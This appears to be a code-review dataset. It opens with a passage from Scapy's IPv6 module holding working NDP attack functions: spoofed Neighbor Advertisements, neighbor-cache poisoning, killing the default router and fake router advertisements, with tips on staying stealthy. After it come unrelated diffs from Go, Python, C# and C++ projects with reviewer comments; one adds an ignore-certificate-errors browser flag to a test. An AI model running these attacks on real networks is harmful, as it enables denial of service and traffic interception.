conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. """ def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. """ def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print("solicited node multicast @ does not match target @!") return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) # Use the target field from the NS rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. """ if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print("Fake RA sent with source address %s" % src) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RS messages received from this source will trigger a reply. Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print("Fake RA sent in response to RS from %s" % src) if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# # Pre-load classes ## ############################################################################# def _get_cls(name): return globals().get(name, Raw) def _load_dict(d): for k, v in d.items(): d[k] = _get_cls(v) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) ############################################################################# ############################################################################# # Layers binding # ############################################################################# ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, _IPv46) conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) bind_layers(GRE, IPv6, proto=0x86dd) bind_layers(SNAP, IPv6, code=0x86dd) bind_layers(Loopback, IPv6, type=socket.AF_INET6) bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
1
18,539
Why are you changing this?
secdev-scapy
py
@@ -35,11 +35,11 @@ func NewConfigParser() *ConsumerConfigParser { } // Parse parses the given configuration -func (c *ConsumerConfigParser) Parse(config json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { +func (c *ConsumerConfigParser) Parse(config *json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { // TODO: since we are getting json.RawMessage here and not interface{} type not sure how to handle multiple services // since NATPinger is one for all services and we get config from communication channel where service type is not know yet. var cfg openvpn.ConsumerConfig - err = json.Unmarshal(config, &cfg) + err = json.Unmarshal(*config, &cfg) if err != nil { return "", 0, "", errors.Wrap(err, "parsing consumer address:port failed") }
1
/* * Copyright (C) 2019 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package config import ( "encoding/json" "github.com/mysteriumnetwork/node/services" "github.com/mysteriumnetwork/node/services/openvpn" "github.com/pkg/errors" ) // ConsumerConfigParser parses consumer configs type ConsumerConfigParser struct { } // NewConfigParser returns a new ConsumerConfigParser func NewConfigParser() *ConsumerConfigParser { return &ConsumerConfigParser{} } // Parse parses the given configuration func (c *ConsumerConfigParser) Parse(config json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { // TODO: since we are getting json.RawMessage here and not interface{} type not sure how to handle multiple services // since NATPinger is one for all services and we get config from communication channel where service type is not know yet. var cfg openvpn.ConsumerConfig err = json.Unmarshal(config, &cfg) if err != nil { return "", 0, "", errors.Wrap(err, "parsing consumer address:port failed") } if cfg.IP == nil { return "", 0, "", errors.New("remote party does not support NAT hole punching, IP:PORT is missing") } return *cfg.IP, cfg.Port, openvpn.ServiceType, nil }
1
14,283
`json.RawMessage` is a `[]byte`, which is already a pointer. Why do we need to have pointer here if we just reading this value?
mysteriumnetwork-node
go
@@ -29,7 +29,7 @@ func main() { cni.ActionAdd.Request, cni.ActionCheck.Request, cni.ActionDel.Request, - cni_version.PluginSupports("0.1.0", "0.2.0", "0.3.0", "0.3.1"), + cni_version.All, fmt.Sprintf("Antrea CNI %s", version.GetFullVersionWithRuntimeInfo()), ) }
1
// Copyright 2019 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "fmt" "github.com/vmware-tanzu/antrea/pkg/cni" "github.com/vmware-tanzu/antrea/pkg/version" "github.com/containernetworking/cni/pkg/skel" cni_version "github.com/containernetworking/cni/pkg/version" ) func main() { skel.PluginMain( cni.ActionAdd.Request, cni.ActionCheck.Request, cni.ActionDel.Request, cni_version.PluginSupports("0.1.0", "0.2.0", "0.3.0", "0.3.1"), fmt.Sprintf("Antrea CNI %s", version.GetFullVersionWithRuntimeInfo()), ) }
1
18,636
should we actually switch to `All` or just add `0.4.0` explicitly to the list of supported CNI versions? What is a new CNI version is released?
antrea-io-antrea
go
@@ -23,6 +23,7 @@ from google.cloud.security.notifier import notifier from google.cloud.security.common.data_access import csv_writer from google.cloud.security.scanner.audit import fw_rules_engine +from google.cloud.security.common.gcp_type import resource_util from google.cloud.security.common.data_access import firewall_rule_dao from google.cloud.security.scanner.scanners import base_scanner
1
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Scanner for the firewall rule engine.""" from datetime import datetime import itertools import os import sys from google.cloud.security.common.util import log_util from google.cloud.security.notifier import notifier from google.cloud.security.common.data_access import csv_writer from google.cloud.security.scanner.audit import fw_rules_engine from google.cloud.security.common.data_access import firewall_rule_dao from google.cloud.security.scanner.scanners import base_scanner LOGGER = log_util.get_logger(__name__) class FwPolicyScanner(base_scanner.BaseScanner): """Scanner for firewall data.""" SCANNER_OUTPUT_CSV_FMT = 'scanner_output_fw.{}.csv' def __init__(self, global_configs, scanner_configs, snapshot_timestamp, rules): """Initialization. Args: global_configs (dict): Global configurations. scanner_configs (dict): Scanner configurations. snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ. rules (str): Fully-qualified path and filename of the rules file. """ super(FwPolicyScanner, self).__init__( global_configs, scanner_configs, snapshot_timestamp, rules) self.rules_engine = fw_rules_engine.FirewallRuleEngine( rules_file_path=self.rules, snapshot_timestamp=self.snapshot_timestamp) self.rules_engine.build_rule_book(self.global_configs) @staticmethod def _flatten_violations(violations): """Flatten RuleViolations into a dict for each RuleViolation member. Args: violations (list): The RuleViolations to flatten. Yields: dict: Iterator of RuleViolations as a dict per member. """ for violation in violations: violation_data = {} violation_data['policy_names'] = violation.policy_names violation_data['recommended_actions'] = ( violation.recommended_actions) violation_dict = { 'resource_id': violation.resource_id, 'resource_type': violation.resource_type, 'rule_id': violation.rule_id, 'violation_type': violation.violation_type, 'violation_data': violation_data } sorted(violation_dict) yield violation_dict def _output_results(self, all_violations, resource_counts): """Output results. Args: all_violations (list): A list of violations resource_counts (int): Resource count. """ resource_name = 'violations' all_violations = list(self._flatten_violations(all_violations)) violation_errors = self._output_results_to_db(resource_name, all_violations) # Write the CSV for all the violations. # TODO: Move this into the base class? The IAP scanner version of this # is a wholesale copy. if self.scanner_configs.get('output_path'): LOGGER.info('Writing violations to csv...') output_csv_name = None with csv_writer.write_csv( resource_name=resource_name, data=all_violations, write_header=True) as csv_file: output_csv_name = csv_file.name LOGGER.info('CSV filename: %s', output_csv_name) # Scanner timestamp for output file and email. now_utc = datetime.utcnow() output_path = self.scanner_configs.get('output_path') if not output_path.startswith('gs://'): if not os.path.exists( self.scanner_configs.get('output_path')): os.makedirs(output_path) output_path = os.path.abspath(output_path) self._upload_csv(output_path, now_utc, output_csv_name) # Send summary email. # TODO: Untangle this email by looking for the csv content # from the saved copy. if self.global_configs.get('email_recipient') is not None: payload = { 'email_description': 'Policy Scan', 'email_sender': self.global_configs.get('email_sender'), 'email_recipient': self.global_configs.get('email_recipient'), 'sendgrid_api_key': self.global_configs.get('sendgrid_api_key'), 'output_csv_name': output_csv_name, 'output_filename': self._get_output_filename(now_utc), 'now_utc': now_utc, 'all_violations': all_violations, 'resource_counts': resource_counts, 'violation_errors': violation_errors } message = { 'status': 'scanner_done', 'payload': payload } notifier.process(message) def _find_violations(self, policies): """Find violations in the policies. Args: policies (list): The a list of resource and policy tuples to find violations in. Returns: list: A list of all violations """ policies = itertools.chain(policies) all_violations = [] LOGGER.info('Finding firewall policy violations...') for (resource, policy) in policies: LOGGER.debug('%s => %s', resource, policy) violations = self.rules_engine.find_policy_violations( resource, policy) all_violations.extend(violations) return all_violations def _retrieve(self): """Retrieves the data for scanner. Returns: list: List of firewall policy data. int: The resource count. """ firewall_policies = (firewall_rule_dao .FirewallRuleDao(self.global_configs) .get_firewall_rules(self.snapshot_timestamp)) if not firewall_policies: LOGGER.warn('No firewall policies found. Exiting.') sys.exit(1) return firewall_policies, len(firewall_policies) def run(self): """Runs the data collection.""" policy_data, resource_counts = self._retrieve() all_violations = self._find_violations(policy_data) self._output_results(all_violations, resource_counts)
1
27,963
pylint might complain that this isn't alphasorted?
forseti-security-forseti-security
py
@@ -52,6 +52,7 @@ namespace Interop.FunctionalTests $"--no-sandbox " + $"--disable-gpu " + $"--allow-insecure-localhost " + + $"--ignore-certificate-errors --enable-features=NetworkService " + $"--enable-logging " + $"--dump-dom " + $"--virtual-time-budget=10000 " +
1
// Copyright (c) .NET Foundation. All rights reserved. // Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information. #if NETCOREAPP2_2 using System; using System.Diagnostics; using System.IO; using System.Net; using System.Threading.Tasks; using Microsoft.AspNetCore.Hosting; using Microsoft.AspNetCore.Http; using Microsoft.AspNetCore.Server.Kestrel.Core; using Microsoft.AspNetCore.Server.Kestrel.FunctionalTests; using Microsoft.AspNetCore.Testing; using Microsoft.AspNetCore.Testing.xunit; using Microsoft.Extensions.Logging; using Microsoft.Extensions.Logging.Testing; using Xunit; namespace Interop.FunctionalTests { [SkipIfChromeUnavailable] public class ChromeTests : LoggedTest { private static readonly string _postHtml = @"<!DOCTYPE html> <html> <head> <script type=""text/javascript""> function dosubmit() { document.forms[0].submit(); } </script> </head> <body onload=""dosubmit();""> <form action=""/"" method=""POST"" accept-charset=""utf-8""> </form> </body> </html>"; private string NetLogPath { get; set; } private string StartupLogPath { get; set; } private string ShutdownLogPath { get; set; } private string ChromeArgs { get; set; } private void InitializeArgs() { NetLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.nl.json"); StartupLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.su.json"); ShutdownLogPath = Path.Combine(ResolvedLogOutputDirectory, $"{ResolvedTestMethodName}.sd.json"); ChromeArgs = $"--headless " + $"--no-sandbox " + $"--disable-gpu " + $"--allow-insecure-localhost " + $"--enable-logging " + $"--dump-dom " + $"--virtual-time-budget=10000 " + $"--log-net-log={NetLogPath} " + $"--trace-startup --trace-startup-file={StartupLogPath} " + $"--trace-shutdown --trace-shutdown-file={ShutdownLogPath}"; } [ConditionalTheory] [OSSkipCondition(OperatingSystems.MacOSX, SkipReason = "Missing SslStream ALPN support: https://github.com/dotnet/corefx/issues/30492")] [MinimumOSVersion(OperatingSystems.Windows, WindowsVersions.Win81, SkipReason = "Missing Windows ALPN support: https://en.wikipedia.org/wiki/Application-Layer_Protocol_Negotiation#Support")] [InlineData("", "Interop HTTP/2 GET")] [InlineData("?TestMethod=POST", "Interop HTTP/2 POST")] public async Task Http2(string requestSuffix, string expectedResponse) { InitializeArgs(); using (var server = new TestServer(async context => { if (string.Equals(context.Request.Query["TestMethod"], "POST", StringComparison.OrdinalIgnoreCase)) { await context.Response.WriteAsync(_postHtml); } else { await context.Response.WriteAsync($"Interop {context.Request.Protocol} {context.Request.Method}"); } }, new TestServiceContext(LoggerFactory), options => options.Listen(IPAddress.Loopback, 0, listenOptions => { listenOptions.Protocols = HttpProtocols.Http2; listenOptions.UseHttps(TestResources.GetTestCertificate()); }))) { var chromeOutput = await RunHeadlessChrome($"https://localhost:{server.Port}/{requestSuffix}"); AssertExpectedResponseOrShowDebugInstructions(expectedResponse, chromeOutput); } } private async Task<string> RunHeadlessChrome(string testUrl) { var chromeArgs = $"{ChromeArgs} {testUrl}"; var chromeStartInfo = new ProcessStartInfo { FileName = ChromeConstants.ExecutablePath, Arguments = chromeArgs, UseShellExecute = false, CreateNoWindow = true, RedirectStandardError = true, RedirectStandardOutput = true }; Logger.LogInformation($"Staring chrome: {ChromeConstants.ExecutablePath} {chromeArgs}"); var headlessChromeProcess = Process.Start(chromeStartInfo); var chromeOutput = await headlessChromeProcess.StandardOutput.ReadToEndAsync(); var chromeError = await headlessChromeProcess.StandardError.ReadToEndAsync(); Logger.LogInformation($"Standard output: {chromeOutput}"); Logger.LogInformation($"Standard error: {chromeError}"); headlessChromeProcess.WaitForExit(); return chromeOutput; } private void AssertExpectedResponseOrShowDebugInstructions(string expectedResponse, string actualResponse) { try { Assert.Contains(expectedResponse, actualResponse); } catch { Logger.LogError("Chrome interop tests failed. Please consult the following logs:"); Logger.LogError($"Network logs: {NetLogPath}"); Logger.LogError($"Startup logs: {StartupLogPath}"); Logger.LogError($"Shutdown logs: {ShutdownLogPath}"); throw; } } } } #elif NET461 // No ALPN support #else #error TFMs need updating #endif
1
17,134
It seems that NetworkService is behind a feature flag because it's still experimental. If we see new issues, we should look at flipping this back off.
aspnet-KestrelHttpServer
.cs
@@ -31,6 +31,19 @@ func (ts *TaskStatus) String() string { return "UNKNOWN" } +// Mapping task status in the agent to that in the backend +func BackEndStatus(ts *TaskStatus) string { + switch *ts { + case TaskRunning: + return "RUNNING" + case TaskStopped: + return "STOPPED" + case TaskDead: + return "STOPPED" + } + return "PENDING" +} + var containerStatusMap = map[string]ContainerStatus{ "NONE": ContainerStatusNone, "UNKNOWN": ContainerStatusUnknown,
1
// Copyright 2014-2015 Amazon.com, Inc. or its affiliates. All Rights Reserved. // // Licensed under the Apache License, Version 2.0 (the "License"). You may // not use this file except in compliance with the License. A copy of the // License is located at // // http://aws.amazon.com/apache2.0/ // // or in the "license" file accompanying this file. This file is distributed // on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either // express or implied. See the License for the specific language governing // permissions and limitations under the License. package api var taskStatusMap = map[string]TaskStatus{ "NONE": TaskStatusNone, "UNKNOWN": TaskStatusUnknown, "CREATED": TaskCreated, "RUNNING": TaskRunning, "STOPPED": TaskStopped, "DEAD": TaskDead, } func (ts *TaskStatus) String() string { for k, v := range taskStatusMap { if v == *ts { return k } } return "UNKNOWN" } var containerStatusMap = map[string]ContainerStatus{ "NONE": ContainerStatusNone, "UNKNOWN": ContainerStatusUnknown, "PULLED": ContainerPulled, "CREATED": ContainerCreated, "RUNNING": ContainerRunning, "STOPPED": ContainerStopped, "DEAD": ContainerDead, } func (cs *ContainerStatus) String() string { for k, v := range containerStatusMap { if v == *cs { return k } } return "UNKNOWN" } func (cs *ContainerStatus) TaskStatus() TaskStatus { switch *cs { case ContainerStatusNone: return TaskStatusNone case ContainerCreated: return TaskCreated case ContainerRunning: return TaskRunning case ContainerStopped: return TaskStopped case ContainerDead: return TaskDead } return TaskStatusUnknown } func (ts *TaskStatus) ContainerStatus() ContainerStatus { switch *ts { case TaskStatusNone: return ContainerStatusNone case TaskCreated: return ContainerCreated case TaskRunning: return ContainerRunning case TaskStopped: return ContainerStopped case TaskDead: return ContainerDead } return ContainerStatusUnknown } func (cs *ContainerStatus) Terminal() bool { if cs == nil { return false } return *cs == ContainerStopped || *cs == ContainerDead } func (ts *TaskStatus) Terminal() bool { if ts == nil { return false } return *ts == TaskStopped || *ts == TaskDead }
1
13,286
I think it makes more sense to have this be a method on TaskStatus. Also, nit, Backend, not BackEnd.
aws-amazon-ecs-agent
go
@@ -154,6 +154,10 @@ int HIPInternal::verify_is_initialized(const char *const label) const { return 0 <= m_hipDev; } +uint32_t HIPInternal::impl_get_instance_id() const noexcept { + return Kokkos::Tools::Experimental::Impl::idForInstance< + Kokkos::Experimental::HIP>(reinterpret_cast<uintptr_t>(this)); +} HIPInternal &HIPInternal::singleton() { static HIPInternal *self = nullptr; if (!self) {
1
